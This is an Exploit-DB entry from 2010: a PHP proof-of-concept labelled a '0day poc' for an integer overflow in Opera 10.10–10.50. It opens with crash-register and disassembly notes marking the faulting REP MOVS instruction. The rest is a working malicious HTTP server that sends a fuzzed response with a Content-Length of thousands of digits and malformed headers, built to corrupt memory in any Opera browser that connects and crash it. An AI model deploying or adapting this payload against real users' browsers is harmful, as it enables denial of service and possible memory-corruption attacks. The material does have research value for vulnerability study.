Opera 10.50 - integer Overflow

EDB-ID:

11622




Platform:

Windows

Date:

2010-03-03


<?php

/*
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
*-------------------------------------------------------------------------------
* Opera 10.10 - 10.50 
* Title: Integer overflow leading 
*                  to 
*        out of bounds array access R/W
*                0day poc
* Autor: Marcin Ressel aka ~echo 
* Date: 3.03.2010 
* Software: http://choice.opera.com/download/get.pl?thanks=true&sub=true&wu=1&wulang=pl&info=1
* Version: Tested on 10.10 , 10.50 but i thing other version is vulnerable to 
* Platform: Windows xp home sp 2 pl
* Muz: http://totgeliebt.wrzuta.pl/audio/6dXgnLnsI82 (podniecilem sie) 
* Contanct: pokoFac_nerda@tvn24.pl
*      
* @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
*
* Exception: Access violation when writing to [01A23000]
* Registers: EAX 03D89DF2
             ECX 3FFF3ABE
             EDX 00000002
             EBX FFFFFFFF
             ESP 0012F158
             EBP 0012F160
             ESI 03DBB2F8
             EDI 01A23000
             EIP 6781E0BA Opera_12.6781E0BA
  
* DUMP Function:
        6781E060   55               PUSH EBP
        6781E061   8BEC             MOV EBP,ESP
        6781E063   57               PUSH EDI
        6781E064   56               PUSH ESI
        6781E065   8B75 0C          MOV ESI,DWORD PTR SS:[EBP+C]
        6781E068   8B4D 10          MOV ECX,DWORD PTR SS:[EBP+10]
        6781E06B   8B7D 08          MOV EDI,DWORD PTR SS:[EBP+8]
        6781E06E   8BC1             MOV EAX,ECX
        6781E070   8BD1             MOV EDX,ECX
        6781E072   03C6             ADD EAX,ESI
        6781E074   3BFE             CMP EDI,ESI
        6781E076   76 08            JBE SHORT Opera_12.6781E080
        6781E078   3BF8             CMP EDI,EAX
        6781E07A   0F82 A4010000    JB Opera_12.6781E224
        6781E080   81F9 00010000    CMP ECX,100
        6781E086   72 1F            JB SHORT Opera_12.6781E0A7
        6781E088   833D 882AF167 00 CMP DWORD PTR DS:[67F12A88],0
        6781E08F   74 16            JE SHORT Opera_12.6781E0A7
        6781E091   57               PUSH EDI
        6781E092   56               PUSH ESI
        6781E093   83E7 0F          AND EDI,0F
        6781E096   83E6 0F          AND ESI,0F
        6781E099   3BFE             CMP EDI,ESI
        6781E09B   5E               POP ESI
        6781E09C   5F               POP EDI
        6781E09D   75 08            JNZ SHORT Opera_12.6781E0A7
        6781E09F   5E               POP ESI
        6781E0A0   5F               POP EDI
        6781E0A1   5D               POP EBP
        6781E0A2  ^E9 88CEFFFF      JMP Opera_12.6781AF2F
        6781E0A7   F7C7 03000000    TEST EDI,3
        6781E0AD   75 15            JNZ SHORT Opera_12.6781E0C4
        6781E0AF   C1E9 02          SHR ECX,2
        6781E0B2   83E2 03          AND EDX,3
        6781E0B5   83F9 08          CMP ECX,8
        6781E0B8   72 2A            JB SHORT Opera_12.6781E0E4
 BUG->  6781E0BA   F3:A5            REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]  <-- BUG 
        6781E0BC   FF2495 D4E18167  JMP DWORD PTR DS:[EDX*4+6781E1D4]
        6781E0C3   90               NOP
        6781E0C4   8BC7             MOV EAX,EDI
        6781E0C6   BA 03000000      MOV EDX,3
        6781E0CB   83E9 04          SUB ECX,4
        6781E0CE   72 0C            JB SHORT Opera_12.6781E0DC
        6781E0D0   83E0 03          AND EAX,3
        6781E0D3   03C8             ADD ECX,EAX
        6781E0D5   FF2485 E8E08167  JMP DWORD PTR DS:[EAX*4+6781E0E8]
        6781E0DC   FF248D E4E18167  JMP DWORD PTR DS:[ECX*4+6781E1E4]
        6781E0E3   90               NOP
        6781E0E4   FF248D 68E18167  JMP DWORD PTR DS:[ECX*4+6781E168]
        ...
*---------------------------------------------------------------------------
* BREAK AT 6781E0BA      
          ECX=3FFF3ABE (decimal 1073691326.)
          DS:[ESI]=[03DBB2F8]=00000000
          ES:[EDI]=[01A23000]=???
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@        
*
*/
  if(strtolower(substr($_ENV['OS'],0,3)) == "win") define('OS','win');
  else define('OS','nix');
     if(!extension_loaded('php_sockets'))
     {  
        if((OS == 'win') && (!@dl('php_sockets.dll')) ||
          ((OS == 'nix') && (!@dl('php_sockets.so')))) 
            die('fatal php_sockets.[dll/so] '.
                'not loaded '."\r\n");            //.__line__.' '.__file__."\r\n");                                                    
     } 
  /*Generated by my own fuzzer*/  
  $EVIL = 'HTTP/1.1 200 ok'."\r\n".
          'Transfer-Encoding: identity'."\r\n".
          'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n".
          'Server: moj zuy server'."\r\n".
          'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n".
          'Content-Location: file://C:/boot.ini'."\r\n".
          'Vary:negotiate,accept-language,accept-charset'."\r\n".
          'Tcn: choice'."\r\n".
          'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n".
          'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n".
          'Accept-Ranges: bytes'."\r\n".
          'Cache-Control: max-age=0'."\r\n".
          'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n".
          'Content-Encoding: identity'."\r\n".
          'Content-Length:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999666'."\r\n".
          'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n".
          'Keep-Alive: timeout=15, max=300'."\r\n".
          'Connection: keep-alive'."\r\n".
          'Content-Type: text/html; charset=iso-8859-2'."\r\n".
          'Age: 1'."\r\n".
          'Allow: GET,HEAD'."\r\n".
          'Content-Disposition: inline'."\r\n".
          'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n".
          'Warning: 199 Miscellaneous warning'."\r\n".
          'Trailer: Max-Forwards'."\r\n".
          'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n".
          'Content-Range: bytes 21010-47021/47022'."\r\n".
          'Content-Language: pl'."\r\n\r\n".
          '<html><head></head><body style="background-color:red;color:white;text-align:center;"><b>seq_end</b><script>location.href="http://swswqosksqowkd";</script></body></html>';
  $buster = $argc - 1;// - 1;
  if($buster > 0)
  {
  for($i = 1; $i<$buster; $i+=2) 
      if(('-port' == $argv[$i]) && ((int)$argv[$i + 1] > 0)) $PORT = $argv[$i + 1];
  }
  else $PORT = 81;                                                                                                                                              
  if(!($SOCKET = socket_create_listen($PORT)))
                 die('fatal socket init failed'."\r\n");
  socket_set_option($SOCKET,SOL_SOCKET,
                            SO_RCVTIMEO,array("sec"=>3,"usec"=>0));    
  echo('SOCKET READY AT PORT '.$PORT."\r\n".
       'Now connect here via opera'."\r\n");                                   
  if($CONNECT = socket_accept($SOCKET))
  {
                $recv_buffer = null;
                echo('Connection ok '."\r\n");
                if(socket_recv($CONNECT,$recv_buffer,8,/*msg_dontwait*/MSG_WAITALL))  
                {
                                if(!@socket_write($CONNECT,$EVIL))
                                {
                                    socket_close($CONNECT);
                                    socket_close($SOCKET);      
                                    die('I cant send payload !'."\r\n"); 
                                }     
                } 
                else echo('Something wrong with client side'."\r\n");
                usleep(120000);
                socket_close($CONNECT);
                socket_close($SOCKET);                                                                 
  }              
  echo('OK ya browser must be death now'."\r\n".
       'Have a nice day lol'."\r\n");   
                
//[2010-03-03 20:47:46]
//i cut be milion dolar man ;=
?>